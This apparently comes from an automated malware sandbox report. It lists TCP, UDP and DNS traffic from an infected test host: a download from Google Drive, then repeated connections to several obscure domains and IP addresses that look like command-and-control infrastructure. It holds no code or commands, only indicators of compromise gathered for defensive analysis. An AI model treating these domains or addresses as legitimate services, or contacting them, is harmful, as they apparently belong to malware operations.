Oct 13, 2021 15:53:36.351676941 CEST	49857	80	192.168.11.20	216.189.108.75
Oct 13, 2021 15:53:36.352612019 CEST	80	49858	216.189.108.75	192.168.11.20
Oct 13, 2021 15:53:36.352662086 CEST	80	49858	216.189.108.75	192.168.11.20
Oct 13, 2021 15:53:36.352952003 CEST	49858	80	192.168.11.20	216.189.108.75
Oct 13, 2021 15:53:36.353127003 CEST	49858	80	192.168.11.20	216.189.108.75
Oct 13, 2021 15:53:36.501475096 CEST	80	49857	216.189.108.75	192.168.11.20
Oct 13, 2021 15:53:36.501527071 CEST	80	49857	216.189.108.75	192.168.11.20
Oct 13, 2021 15:53:36.501693010 CEST	49857	80	192.168.11.20	216.189.108.75
Oct 13, 2021 15:53:36.501789093 CEST	49857	80	192.168.11.20	216.189.108.75
Oct 13, 2021 15:53:36.501924038 CEST	80	49857	216.189.108.75	192.168.11.20
Oct 13, 2021 15:53:36.501997948 CEST	80	49857	216.189.108.75	192.168.11.20
Oct 13, 2021 15:53:36.502038956 CEST	80	49857	216.189.108.75	192.168.11.20
Oct 13, 2021 15:53:36.502089977 CEST	80	49857	216.189.108.75	192.168.11.20
Oct 13, 2021 15:53:36.502193928 CEST	49857	80	192.168.11.20	216.189.108.75
Oct 13, 2021 15:53:36.502263069 CEST	80	49857	216.189.108.75	192.168.11.20
Oct 13, 2021 15:53:36.502379894 CEST	49857	80	192.168.11.20	216.189.108.75
Oct 13, 2021 15:53:36.502407074 CEST	80	49857	216.189.108.75	192.168.11.20
Oct 13, 2021 15:53:36.502463102 CEST	80	49857	216.189.108.75	192.168.11.20
Oct 13, 2021 15:53:36.502501011 CEST	80	49857	216.189.108.75	192.168.11.20
Oct 13, 2021 15:53:36.502511024 CEST	49857	80	192.168.11.20	216.189.108.75
Oct 13, 2021 15:53:36.502628088 CEST	80	49857	216.189.108.75	192.168.11.20
Oct 13, 2021 15:53:36.502721071 CEST	49857	80	192.168.11.20	216.189.108.75
Oct 13, 2021 15:53:36.502906084 CEST	49857	80	192.168.11.20	216.189.108.75
Oct 13, 2021 15:53:36.502974987 CEST	80	49857	216.189.108.75	192.168.11.20
Oct 13, 2021 15:53:36.503009081 CEST	80	49857	216.189.108.75	192.168.11.20
Oct 13, 2021 15:53:36.503038883 CEST	80	49857	216.189.108.75	192.168.11.20
Oct 13, 2021 15:53:36.503086090 CEST	49857	80	192.168.11.20	216.189.108.75
Oct 13, 2021 15:53:36.503148079 CEST	80	49857	216.189.108.75	192.168.11.20
Oct 13, 2021 15:53:36.503252029 CEST	49857	80	192.168.11.20	216.189.108.75
Oct 13, 2021 15:53:36.503258944 CEST	80	49857	216.189.108.75	192.168.11.20
Oct 13, 2021 15:53:36.503853083 CEST	80	49858	216.189.108.75	192.168.11.20
Oct 13, 2021 15:53:36.652472973 CEST	80	49857	216.189.108.75	192.168.11.20
Oct 13, 2021 15:53:36.652539015 CEST	80	49857	216.189.108.75	192.168.11.20
Oct 13, 2021 15:53:36.652571917 CEST	80	49857	216.189.108.75	192.168.11.20
Oct 13, 2021 15:53:36.653122902 CEST	80	49857	216.189.108.75	192.168.11.20
Oct 13, 2021 15:53:36.653192043 CEST	80	49857	216.189.108.75	192.168.11.20
Oct 13, 2021 15:53:36.653451920 CEST	80	49857	216.189.108.75	192.168.11.20
Oct 13, 2021 15:53:36.653503895 CEST	80	49857	216.189.108.75	192.168.11.20
Oct 13, 2021 15:53:36.653561115 CEST	80	49857	216.189.108.75	192.168.11.20
Oct 13, 2021 15:53:36.653592110 CEST	80	49857	216.189.108.75	192.168.11.20
Oct 13, 2021 15:53:36.653680086 CEST	80	49857	216.189.108.75	192.168.11.20
Oct 13, 2021 15:53:36.653959036 CEST	80	49857	216.189.108.75	192.168.11.20
Oct 13, 2021 15:53:36.654073000 CEST	80	49857	216.189.108.75	192.168.11.20
Oct 13, 2021 15:53:36.654105902 CEST	80	49857	216.189.108.75	192.168.11.20
Oct 13, 2021 15:53:36.654172897 CEST	80	49857	216.189.108.75	192.168.11.20
Oct 13, 2021 15:53:36.654762983 CEST	80	49857	216.189.108.75	192.168.11.20
Oct 13, 2021 15:53:36.654827118 CEST	80	49857	216.189.108.75	192.168.11.20
Oct 13, 2021 15:53:36.654860973 CEST	80	49857	216.189.108.75	192.168.11.20
Oct 13, 2021 15:53:36.654910088 CEST	80	49857	216.189.108.75	192.168.11.20
Oct 13, 2021 15:53:36.654941082 CEST	80	49857	216.189.108.75	192.168.11.20
Oct 13, 2021 15:53:36.655211926 CEST	80	49857	216.189.108.75	192.168.11.20
Oct 13, 2021 15:53:36.655258894 CEST	80	49857	216.189.108.75	192.168.11.20
Oct 13, 2021 15:53:36.657118082 CEST	80	49857	216.189.108.75	192.168.11.20
Oct 13, 2021 15:53:36.657172918 CEST	80	49857	216.189.108.75	192.168.11.20
Oct 13, 2021 15:53:36.657314062 CEST	49857	80	192.168.11.20	216.189.108.75
Oct 13, 2021 15:53:36.657367945 CEST	49857	80	192.168.11.20	216.189.108.75
Oct 13, 2021 15:53:41.365210056 CEST	49859	80	192.168.11.20	199.34.228.191
Oct 13, 2021 15:53:41.524636030 CEST	80	49859	199.34.228.191	192.168.11.20
Oct 13, 2021 15:53:41.525304079 CEST	49859	80	192.168.11.20	199.34.228.191
Oct 13, 2021 15:53:41.526828051 CEST	49859	80	192.168.11.20	199.34.228.191
Oct 13, 2021 15:53:41.526865005 CEST	49859	80	192.168.11.20	199.34.228.191
Oct 13, 2021 15:53:41.526973009 CEST	49860	80	192.168.11.20	199.34.228.191
Oct 13, 2021 15:53:41.686711073 CEST	80	49859	199.34.228.191	192.168.11.20
Oct 13, 2021 15:53:41.686762094 CEST	80	49859	199.34.228.191	192.168.11.20
Oct 13, 2021 15:53:41.686791897 CEST	80	49859	199.34.228.191	192.168.11.20
Oct 13, 2021 15:53:41.686825037 CEST	80	49859	199.34.228.191	192.168.11.20
Oct 13, 2021 15:53:41.686855078 CEST	80	49859	199.34.228.191	192.168.11.20
Oct 13, 2021 15:53:41.686892986 CEST	80	49860	199.34.228.191	192.168.11.20
Oct 13, 2021 15:53:41.686937094 CEST	49859	80	192.168.11.20	199.34.228.191
Oct 13, 2021 15:53:41.687051058 CEST	49859	80	192.168.11.20	199.34.228.191
Oct 13, 2021 15:53:41.687237024 CEST	49859	80	192.168.11.20	199.34.228.191
Oct 13, 2021 15:53:41.687253952 CEST	49860	80	192.168.11.20	199.34.228.191
Oct 13, 2021 15:53:41.687304020 CEST	49860	80	192.168.11.20	199.34.228.191
Oct 13, 2021 15:53:41.847085953 CEST	80	49859	199.34.228.191	192.168.11.20
Oct 13, 2021 15:53:41.847197056 CEST	80	49859	199.34.228.191	192.168.11.20
Oct 13, 2021 15:53:41.847284079 CEST	80	49859	199.34.228.191	192.168.11.20
Oct 13, 2021 15:53:41.847326994 CEST	80	49859	199.34.228.191	192.168.11.20
Oct 13, 2021 15:53:41.847326994 CEST	49859	80	192.168.11.20	199.34.228.191
Oct 13, 2021 15:53:41.847367048 CEST	80	49859	199.34.228.191	192.168.11.20
Oct 13, 2021 15:53:41.847409010 CEST	80	49859	199.34.228.191	192.168.11.20
Oct 13, 2021 15:53:41.847445011 CEST	49859	80	192.168.11.20	199.34.228.191
Oct 13, 2021 15:53:41.847480059 CEST	80	49859	199.34.228.191	192.168.11.20
Oct 13, 2021 15:53:41.847524881 CEST	80	49859	199.34.228.191	192.168.11.20
Oct 13, 2021 15:53:41.847568989 CEST	80	49859	199.34.228.191	192.168.11.20
Oct 13, 2021 15:53:41.847625017 CEST	80	49859	199.34.228.191	192.168.11.20
Oct 13, 2021 15:53:41.847696066 CEST	49859	80	192.168.11.20	199.34.228.191
Oct 13, 2021 15:53:41.847834110 CEST	49859	80	192.168.11.20	199.34.228.191
Oct 13, 2021 15:53:41.847924948 CEST	80	49860	199.34.228.191	192.168.11.20
Oct 13, 2021 15:53:41.848062038 CEST	49859	80	192.168.11.20	199.34.228.191
Oct 13, 2021 15:53:41.879709005 CEST	80	49860	199.34.228.191	192.168.11.20
Oct 13, 2021 15:53:41.879796982 CEST	80	49860	199.34.228.191	192.168.11.20
Oct 13, 2021 15:53:41.879843950 CEST	80	49860	199.34.228.191	192.168.11.20
Oct 13, 2021 15:53:41.879885912 CEST	80	49860	199.34.228.191	192.168.11.20
Oct 13, 2021 15:53:41.880162001 CEST	49860	80	192.168.11.20	199.34.228.191
Oct 13, 2021 15:53:41.880225897 CEST	49860	80	192.168.11.20	199.34.228.191
Oct 13, 2021 15:53:41.880240917 CEST	49860	80	192.168.11.20	199.34.228.191
Oct 13, 2021 15:53:41.880250931 CEST	49860	80	192.168.11.20	199.34.228.191
Oct 13, 2021 15:53:42.007688046 CEST	80	49859	199.34.228.191	192.168.11.20
Oct 13, 2021 15:53:42.007764101 CEST	80	49859	199.34.228.191	192.168.11.20
Oct 13, 2021 15:53:42.007803917 CEST	80	49859	199.34.228.191	192.168.11.20
Oct 13, 2021 15:53:42.007919073 CEST	49859	80	192.168.11.20	199.34.228.191
Oct 13, 2021 15:53:42.007987022 CEST	80	49859	199.34.228.191	192.168.11.20
Oct 13, 2021 15:53:42.008048058 CEST	49859	80	192.168.11.20	199.34.228.191
Oct 13, 2021 15:53:42.008049965 CEST	80	49859	199.34.228.191	192.168.11.20
Oct 13, 2021 15:53:42.008225918 CEST	80	49859	199.34.228.191	192.168.11.20
Oct 13, 2021 15:53:42.008253098 CEST	49859	80	192.168.11.20	199.34.228.191
Oct 13, 2021 15:53:42.008374929 CEST	80	49859	199.34.228.191	192.168.11.20
Oct 13, 2021 15:53:42.008414030 CEST	80	49859	199.34.228.191	192.168.11.20
Oct 13, 2021 15:53:42.008433104 CEST	49859	80	192.168.11.20	199.34.228.191
Oct 13, 2021 15:53:42.008543015 CEST	80	49859	199.34.228.191	192.168.11.20
Oct 13, 2021 15:53:42.008676052 CEST	80	49859	199.34.228.191	192.168.11.20
Oct 13, 2021 15:53:42.008786917 CEST	49859	80	192.168.11.20	199.34.228.191
Oct 13, 2021 15:53:42.008991003 CEST	80	49859	199.34.228.191	192.168.11.20
Oct 13, 2021 15:53:42.009129047 CEST	80	49859	199.34.228.191	192.168.11.20
Oct 13, 2021 15:53:42.009255886 CEST	80	49859	199.34.228.191	192.168.11.20
Oct 13, 2021 15:53:42.009381056 CEST	80	49859	199.34.228.191	192.168.11.20
Oct 13, 2021 15:53:42.009505987 CEST	80	49859	199.34.228.191	192.168.11.20
Oct 13, 2021 15:53:42.009685993 CEST	80	49859	199.34.228.191	192.168.11.20
Oct 13, 2021 15:53:42.009929895 CEST	80	49859	199.34.228.191	192.168.11.20
Oct 13, 2021 15:53:42.009968996 CEST	80	49859	199.34.228.191	192.168.11.20
Oct 13, 2021 15:53:42.010231972 CEST	80	49859	199.34.228.191	192.168.11.20
Oct 13, 2021 15:53:42.010274887 CEST	80	49859	199.34.228.191	192.168.11.20
Oct 13, 2021 15:53:42.041492939 CEST	80	49860	199.34.228.191	192.168.11.20
Oct 13, 2021 15:53:42.168056011 CEST	80	49859	199.34.228.191	192.168.11.20
Oct 13, 2021 15:53:42.168240070 CEST	80	49859	199.34.228.191	192.168.11.20
Oct 13, 2021 15:53:42.168315887 CEST	80	49859	199.34.228.191	192.168.11.20
Oct 13, 2021 15:53:42.168662071 CEST	80	49859	199.34.228.191	192.168.11.20
Oct 13, 2021 15:53:42.168723106 CEST	80	49859	199.34.228.191	192.168.11.20
Oct 13, 2021 15:53:42.169214010 CEST	80	49859	199.34.228.191	192.168.11.20
Oct 13, 2021 15:53:42.169279099 CEST	80	49859	199.34.228.191	192.168.11.20
Oct 13, 2021 15:53:42.169625044 CEST	80	49859	199.34.228.191	192.168.11.20
Oct 13, 2021 15:53:42.169758081 CEST	80	49859	199.34.228.191	192.168.11.20
Oct 13, 2021 15:53:42.169801950 CEST	80	49859	199.34.228.191	192.168.11.20
Oct 13, 2021 15:53:42.170167923 CEST	80	49859	199.34.228.191	192.168.11.20
Oct 13, 2021 15:53:42.170248985 CEST	80	49859	199.34.228.191	192.168.11.20
Oct 13, 2021 15:53:42.170296907 CEST	80	49859	199.34.228.191	192.168.11.20
Oct 13, 2021 15:53:42.170361996 CEST	80	49859	199.34.228.191	192.168.11.20
Oct 13, 2021 15:53:42.170403004 CEST	80	49859	199.34.228.191	192.168.11.20
Oct 13, 2021 15:53:42.171236992 CEST	80	49859	199.34.228.191	192.168.11.20
Oct 13, 2021 15:54:19.466716051 CEST	49862	80	192.168.11.20	199.34.228.191
Oct 13, 2021 15:54:19.626779079 CEST	80	49862	199.34.228.191	192.168.11.20
Oct 13, 2021 15:54:19.627126932 CEST	49862	80	192.168.11.20	199.34.228.191
Oct 13, 2021 15:54:19.627223015 CEST	49862	80	192.168.11.20	199.34.228.191
Oct 13, 2021 15:54:19.787246943 CEST	80	49862	199.34.228.191	192.168.11.20
Oct 13, 2021 15:54:19.820161104 CEST	80	49862	199.34.228.191	192.168.11.20
Oct 13, 2021 15:54:19.820234060 CEST	80	49862	199.34.228.191	192.168.11.20
Oct 13, 2021 15:54:19.820313931 CEST	80	49862	199.34.228.191	192.168.11.20
Oct 13, 2021 15:54:19.820363998 CEST	80	49862	199.34.228.191	192.168.11.20
Oct 13, 2021 15:54:19.820513010 CEST	49862	80	192.168.11.20	199.34.228.191
Oct 13, 2021 15:54:19.820581913 CEST	49862	80	192.168.11.20	199.34.228.191
Oct 13, 2021 15:54:29.893709898 CEST	49863	80	192.168.11.20	137.117.17.70
Oct 13, 2021 15:54:30.056212902 CEST	80	49863	137.117.17.70	192.168.11.20
Oct 13, 2021 15:54:30.056443930 CEST	49863	80	192.168.11.20	137.117.17.70
Oct 13, 2021 15:54:30.056495905 CEST	49863	80	192.168.11.20	137.117.17.70
Oct 13, 2021 15:54:30.226277113 CEST	80	49863	137.117.17.70	192.168.11.20
Oct 13, 2021 15:54:30.226644039 CEST	49863	80	192.168.11.20	137.117.17.70
Oct 13, 2021 15:54:30.226692915 CEST	49863	80	192.168.11.20	137.117.17.70
Oct 13, 2021 15:54:30.389055014 CEST	80	49863	137.117.17.70	192.168.11.20
Oct 13, 2021 15:54:35.271178961 CEST	49864	80	192.168.11.20	192.0.78.25
Oct 13, 2021 15:54:35.279447079 CEST	80	49864	192.0.78.25	192.168.11.20
Oct 13, 2021 15:54:35.279695034 CEST	49864	80	192.168.11.20	192.0.78.25
Oct 13, 2021 15:54:35.279756069 CEST	49864	80	192.168.11.20	192.0.78.25
Oct 13, 2021 15:54:35.288063049 CEST	80	49864	192.0.78.25	192.168.11.20
Oct 13, 2021 15:54:35.447942019 CEST	80	49864	192.0.78.25	192.168.11.20
Oct 13, 2021 15:54:35.447976112 CEST	80	49864	192.0.78.25	192.168.11.20
Oct 13, 2021 15:54:35.448339939 CEST	49864	80	192.168.11.20	192.0.78.25
Oct 13, 2021 15:54:35.448375940 CEST	49864	80	192.168.11.20	192.0.78.25
Oct 13, 2021 15:54:35.456573009 CEST	80	49864	192.0.78.25	192.168.11.20
Oct 13, 2021 15:54:40.697959900 CEST	49865	80	192.168.11.20	3.121.211.190
Oct 13, 2021 15:54:40.708642960 CEST	80	49865	3.121.211.190	192.168.11.20
Oct 13, 2021 15:54:40.708813906 CEST	49865	80	192.168.11.20	3.121.211.190
Oct 13, 2021 15:54:40.708901882 CEST	49865	80	192.168.11.20	3.121.211.190
Oct 13, 2021 15:54:40.719494104 CEST	80	49865	3.121.211.190	192.168.11.20
Oct 13, 2021 15:54:40.719755888 CEST	80	49865	3.121.211.190	192.168.11.20
Oct 13, 2021 15:54:40.719803095 CEST	80	49865	3.121.211.190	192.168.11.20
Oct 13, 2021 15:54:40.720057011 CEST	49865	80	192.168.11.20	3.121.211.190
Oct 13, 2021 15:54:40.720104933 CEST	49865	80	192.168.11.20	3.121.211.190
Oct 13, 2021 15:54:40.731120110 CEST	80	49865	3.121.211.190	192.168.11.20
Oct 13, 2021 15:54:46.243675947 CEST	49866	80	192.168.11.20	156.67.72.176
Oct 13, 2021 15:54:46.389864922 CEST	80	49866	156.67.72.176	192.168.11.20
Oct 13, 2021 15:54:46.390172958 CEST	49866	80	192.168.11.20	156.67.72.176
Oct 13, 2021 15:54:46.390230894 CEST	49866	80	192.168.11.20	156.67.72.176
Oct 13, 2021 15:54:46.536413908 CEST	80	49866	156.67.72.176	192.168.11.20
Oct 13, 2021 15:54:46.536946058 CEST	80	49866	156.67.72.176	192.168.11.20
Oct 13, 2021 15:54:46.537038088 CEST	80	49866	156.67.72.176	192.168.11.20
Oct 13, 2021 15:54:46.537378073 CEST	49866	80	192.168.11.20	156.67.72.176
Oct 13, 2021 15:54:46.683787107 CEST	80	49866	156.67.72.176	192.168.11.20
Oct 13, 2021 15:54:51.553221941 CEST	49867	80	192.168.11.20	198.54.117.210
Oct 13, 2021 15:54:51.707479000 CEST	80	49867	198.54.117.210	192.168.11.20
Oct 13, 2021 15:54:51.707875967 CEST	49867	80	192.168.11.20	198.54.117.210
Oct 13, 2021 15:54:51.707982063 CEST	49867	80	192.168.11.20	198.54.117.210
Oct 13, 2021 15:54:51.862286091 CEST	80	49867	198.54.117.210	192.168.11.20
Oct 13, 2021 15:54:51.862356901 CEST	80	49867	198.54.117.210	192.168.11.20
Oct 13, 2021 15:54:56.863365889 CEST	49868	80	192.168.11.20	204.141.43.204
Oct 13, 2021 15:54:57.026931047 CEST	80	49868	204.141.43.204	192.168.11.20
Oct 13, 2021 15:54:57.027091026 CEST	49868	80	192.168.11.20	204.141.43.204
Oct 13, 2021 15:54:57.027148962 CEST	49868	80	192.168.11.20	204.141.43.204
Oct 13, 2021 15:54:57.196141958 CEST	80	49868	204.141.43.204	192.168.11.20
Oct 13, 2021 15:54:57.196249008 CEST	80	49868	204.141.43.204	192.168.11.20
Oct 13, 2021 15:54:57.196261883 CEST	80	49868	204.141.43.204	192.168.11.20
Oct 13, 2021 15:54:57.196270943 CEST	80	49868	204.141.43.204	192.168.11.20
Oct 13, 2021 15:54:57.196279049 CEST	80	49868	204.141.43.204	192.168.11.20
Oct 13, 2021 15:54:57.196556091 CEST	49868	80	192.168.11.20	204.141.43.204
Oct 13, 2021 15:54:57.196563959 CEST	49868	80	192.168.11.20	204.141.43.204
Oct 13, 2021 15:54:57.360068083 CEST	80	49868	204.141.43.204	192.168.11.20
Oct 13, 2021 15:55:00.503810883 CEST	49844	80	192.168.11.20	154.215.231.81

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 13, 2021 15:47:08.569448948 CEST	58936	53	192.168.11.20	1.1.1.1
Oct 13, 2021 15:47:08.587738991 CEST	53	58936	1.1.1.1	192.168.11.20
Oct 13, 2021 15:47:09.256728888 CEST	54440	53	192.168.11.20	1.1.1.1
Oct 13, 2021 15:47:09.285367012 CEST	53	54440	1.1.1.1	192.168.11.20
Oct 13, 2021 15:48:15.109159946 CEST	61296	53	192.168.11.20	1.1.1.1
Oct 13, 2021 15:48:15.788871050 CEST	53	61296	1.1.1.1	192.168.11.20
Oct 13, 2021 15:48:20.857351065 CEST	65257	53	192.168.11.20	1.1.1.1
Oct 13, 2021 15:48:21.483603954 CEST	53	65257	1.1.1.1	192.168.11.20
Oct 13, 2021 15:48:26.840656042 CEST	53699	53	192.168.11.20	1.1.1.1
Oct 13, 2021 15:48:26.940375090 CEST	53	53699	1.1.1.1	192.168.11.20
Oct 13, 2021 15:48:31.979652882 CEST	58532	53	192.168.11.20	1.1.1.1
Oct 13, 2021 15:48:32.005676985 CEST	53	58532	1.1.1.1	192.168.11.20
Oct 13, 2021 15:48:37.134753942 CEST	51795	53	192.168.11.20	1.1.1.1
Oct 13, 2021 15:48:37.670172930 CEST	53	51795	1.1.1.1	192.168.11.20
Oct 13, 2021 15:48:43.227217913 CEST	61023	53	192.168.11.20	1.1.1.1
Oct 13, 2021 15:48:43.982966900 CEST	53	61023	1.1.1.1	192.168.11.20
Oct 13, 2021 15:48:49.257591963 CEST	65288	53	192.168.11.20	1.1.1.1
Oct 13, 2021 15:48:49.577518940 CEST	53	65288	1.1.1.1	192.168.11.20
Oct 13, 2021 15:48:54.865354061 CEST	52570	53	192.168.11.20	1.1.1.1
Oct 13, 2021 15:48:55.396420956 CEST	53	52570	1.1.1.1	192.168.11.20
Oct 13, 2021 15:49:00.520138025 CEST	59562	53	192.168.11.20	1.1.1.1
Oct 13, 2021 15:49:00.628799915 CEST	53	59562	1.1.1.1	192.168.11.20
Oct 13, 2021 15:49:05.956368923 CEST	65455	53	192.168.11.20	1.1.1.1
Oct 13, 2021 15:49:06.245028019 CEST	53	65455	1.1.1.1	192.168.11.20
Oct 13, 2021 15:49:11.596829891 CEST	62529	53	192.168.11.20	1.1.1.1
Oct 13, 2021 15:49:11.612540960 CEST	53	62529	1.1.1.1	192.168.11.20
Oct 13, 2021 15:49:16.735208035 CEST	65172	53	192.168.11.20	1.1.1.1
Oct 13, 2021 15:49:16.920985937 CEST	53	65172	1.1.1.1	192.168.11.20
Oct 13, 2021 15:49:27.170883894 CEST	57083	53	192.168.11.20	1.1.1.1
Oct 13, 2021 15:49:27.864936113 CEST	53	57083	1.1.1.1	192.168.11.20
Oct 13, 2021 15:49:33.169308901 CEST	63468	53	192.168.11.20	1.1.1.1
Oct 13, 2021 15:49:33.560539007 CEST	53	63468	1.1.1.1	192.168.11.20
Oct 13, 2021 15:49:38.917963028 CEST	62088	53	192.168.11.20	1.1.1.1
Oct 13, 2021 15:49:39.389076948 CEST	53	62088	1.1.1.1	192.168.11.20
Oct 13, 2021 15:49:39.389360905 CEST	62088	53	192.168.11.20	9.9.9.9
Oct 13, 2021 15:49:40.401524067 CEST	62088	53	192.168.11.20	9.9.9.9
Oct 13, 2021 15:49:40.816879988 CEST	53	62088	9.9.9.9	192.168.11.20
Oct 13, 2021 15:49:40.985773087 CEST	53	62088	9.9.9.9	192.168.11.20
Oct 13, 2021 15:49:51.055682898 CEST	60258	53	192.168.11.20	1.1.1.1
Oct 13, 2021 15:49:51.468550920 CEST	53	60258	1.1.1.1	192.168.11.20
Oct 13, 2021 15:49:56.663837910 CEST	54886	53	192.168.11.20	1.1.1.1
Oct 13, 2021 15:49:56.697240114 CEST	53	54886	1.1.1.1	192.168.11.20
Oct 13, 2021 15:50:02.038378954 CEST	65091	53	192.168.11.20	1.1.1.1
Oct 13, 2021 15:50:02.073247910 CEST	53	65091	1.1.1.1	192.168.11.20
Oct 13, 2021 15:50:07.208560944 CEST	49777	53	192.168.11.20	1.1.1.1
Oct 13, 2021 15:50:07.406692982 CEST	53	49777	1.1.1.1	192.168.11.20
Oct 13, 2021 15:50:12.582761049 CEST	61163	53	192.168.11.20	1.1.1.1
Oct 13, 2021 15:50:12.936949015 CEST	53	61163	1.1.1.1	192.168.11.20
Oct 13, 2021 15:50:23.579931974 CEST	50140	53	192.168.11.20	1.1.1.1
Oct 13, 2021 15:50:23.682571888 CEST	53	50140	1.1.1.1	192.168.11.20
Oct 13, 2021 15:50:29.032129049 CEST	49488	53	192.168.11.20	1.1.1.1
Oct 13, 2021 15:50:29.085437059 CEST	53	49488	1.1.1.1	192.168.11.20
Oct 13, 2021 15:50:55.104711056 CEST	55375	53	192.168.11.20	1.1.1.1
Oct 13, 2021 15:50:55.151947021 CEST	53	55375	1.1.1.1	192.168.11.20
Oct 13, 2021 15:51:20.223670959 CEST	60601	53	192.168.11.20	1.1.1.1
Oct 13, 2021 15:51:20.482215881 CEST	53	60601	1.1.1.1	192.168.11.20
Oct 13, 2021 15:51:20.482564926 CEST	60601	53	192.168.11.20	9.9.9.9
Oct 13, 2021 15:51:21.488670111 CEST	60601	53	192.168.11.20	9.9.9.9
Oct 13, 2021 15:51:22.106215000 CEST	53	60601	9.9.9.9	192.168.11.20
Oct 13, 2021 15:51:22.214874983 CEST	53	60601	9.9.9.9	192.168.11.20
Oct 13, 2021 15:51:39.344506025 CEST	55116	53	192.168.11.20	1.1.1.1
Oct 13, 2021 15:51:40.359618902 CEST	55116	53	192.168.11.20	9.9.9.9
Oct 13, 2021 15:51:40.712682009 CEST	53	55116	9.9.9.9	192.168.11.20
Oct 13, 2021 15:51:40.936865091 CEST	53	55116	1.1.1.1	192.168.11.20
Oct 13, 2021 15:51:46.545898914 CEST	62423	53	192.168.11.20	9.9.9.9
Oct 13, 2021 15:51:46.590653896 CEST	53	62423	9.9.9.9	192.168.11.20
Oct 13, 2021 15:51:47.105791092 CEST	63405	53	192.168.11.20	9.9.9.9
Oct 13, 2021 15:51:47.123405933 CEST	53	63405	9.9.9.9	192.168.11.20
Oct 13, 2021 15:51:47.475670099 CEST	53215	53	192.168.11.20	9.9.9.9
Oct 13, 2021 15:51:47.479154110 CEST	53	53215	9.9.9.9	192.168.11.20
Oct 13, 2021 15:51:51.607357025 CEST	54378	53	192.168.11.20	9.9.9.9
Oct 13, 2021 15:51:51.636647940 CEST	53	54378	9.9.9.9	192.168.11.20
Oct 13, 2021 15:51:56.654273033 CEST	53093	53	192.168.11.20	9.9.9.9
Oct 13, 2021 15:51:56.689119101 CEST	53	53093	9.9.9.9	192.168.11.20
Oct 13, 2021 15:52:18.492887974 CEST	60411	53	192.168.11.20	9.9.9.9
Oct 13, 2021 15:52:18.521131992 CEST	53	60411	9.9.9.9	192.168.11.20
Oct 13, 2021 15:52:35.173947096 CEST	63381	53	192.168.11.20	9.9.9.9
Oct 13, 2021 15:52:43.846261978 CEST	51282	53	192.168.11.20	9.9.9.9
Oct 13, 2021 15:52:43.879914045 CEST	53	51282	9.9.9.9	192.168.11.20
Oct 13, 2021 15:52:59.186666012 CEST	62614	53	192.168.11.20	9.9.9.9
Oct 13, 2021 15:52:59.362169027 CEST	53	62614	9.9.9.9	192.168.11.20
Oct 13, 2021 15:53:46.894329071 CEST	52514	53	192.168.11.20	9.9.9.9
Oct 13, 2021 15:53:47.114963055 CEST	53	52514	9.9.9.9	192.168.11.20
Oct 13, 2021 15:53:47.115298986 CEST	52514	53	192.168.11.20	1.1.1.1
Oct 13, 2021 15:53:47.967560053 CEST	53	52514	1.1.1.1	192.168.11.20
Oct 13, 2021 15:54:00.594572067 CEST	50098	53	192.168.11.20	9.9.9.9
Oct 13, 2021 15:54:01.109817982 CEST	50098	53	192.168.11.20	1.1.1.1
Oct 13, 2021 15:54:02.125168085 CEST	50098	53	192.168.11.20	9.9.9.9
Oct 13, 2021 15:54:04.140288115 CEST	50098	53	192.168.11.20	9.9.9.9
Oct 13, 2021 15:54:04.140337944 CEST	50098	53	192.168.11.20	1.1.1.1
Oct 13, 2021 15:54:08.155180931 CEST	50098	53	192.168.11.20	9.9.9.9
Oct 13, 2021 15:54:08.155185938 CEST	50098	53	192.168.11.20	1.1.1.1
Oct 13, 2021 15:54:08.497015953 CEST	53	50098	1.1.1.1	192.168.11.20
Oct 13, 2021 15:54:08.497062922 CEST	53	50098	1.1.1.1	192.168.11.20
Oct 13, 2021 15:54:08.497095108 CEST	53	50098	1.1.1.1	192.168.11.20
Oct 13, 2021 15:54:11.217573881 CEST	53	50098	9.9.9.9	192.168.11.20
Oct 13, 2021 15:54:13.514287949 CEST	51930	53	192.168.11.20	9.9.9.9
Oct 13, 2021 15:54:13.755866051 CEST	53	51930	9.9.9.9	192.168.11.20
Oct 13, 2021 15:54:13.756365061 CEST	51930	53	192.168.11.20	1.1.1.1
Oct 13, 2021 15:54:14.460324049 CEST	53	51930	1.1.1.1	192.168.11.20
Oct 13, 2021 15:54:15.522609949 CEST	53	50098	9.9.9.9	192.168.11.20
Oct 13, 2021 15:54:24.824090958 CEST	49243	53	192.168.11.20	9.9.9.9
Oct 13, 2021 15:54:24.847409964 CEST	53	49243	9.9.9.9	192.168.11.20
Oct 13, 2021 15:54:29.853694916 CEST	60183	53	192.168.11.20	9.9.9.9
Oct 13, 2021 15:54:29.893034935 CEST	53	60183	9.9.9.9	192.168.11.20
Oct 13, 2021 15:54:35.227685928 CEST	59744	53	192.168.11.20	9.9.9.9
Oct 13, 2021 15:54:35.270330906 CEST	53	59744	9.9.9.9	192.168.11.20
Oct 13, 2021 15:54:40.461359024 CEST	51607	53	192.168.11.20	9.9.9.9
Oct 13, 2021 15:54:40.697252989 CEST	53	51607	9.9.9.9	192.168.11.20
Oct 13, 2021 15:54:45.725404978 CEST	51003	53	192.168.11.20	9.9.9.9
Oct 13, 2021 15:54:46.240529060 CEST	51003	53	192.168.11.20	1.1.1.1
Oct 13, 2021 15:54:46.242796898 CEST	53	51003	9.9.9.9	192.168.11.20
Oct 13, 2021 15:54:46.424149036 CEST	53	51003	1.1.1.1	192.168.11.20

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Oct 13, 2021 15:47:08.569448948 CEST	192.168.11.20	1.1.1.1	0xe847	Standard query (0)	drive.google.com	A (IP address)	IN (0x0001)
Oct 13, 2021 15:47:09.256728888 CEST	192.168.11.20	1.1.1.1	0xd600	Standard query (0)	doc-04-7g-docs.googleusercontent.com	A (IP address)	IN (0x0001)
Oct 13, 2021 15:48:15.109159946 CEST	192.168.11.20	1.1.1.1	0x2583	Standard query (0)	www.hkautobox.com	A (IP address)	IN (0x0001)
Oct 13, 2021 15:48:20.857351065 CEST	192.168.11.20	1.1.1.1	0xcca5	Standard query (0)	www.taichan.xyz	A (IP address)	IN (0x0001)
Oct 13, 2021 15:48:26.840656042 CEST	192.168.11.20	1.1.1.1	0x62bf	Standard query (0)	www.researchlearningspirit.xyz	A (IP address)	IN (0x0001)
Oct 13, 2021 15:48:31.979652882 CEST	192.168.11.20	1.1.1.1	0x79d5	Standard query (0)	www.bestofnapa.guide	A (IP address)	IN (0x0001)
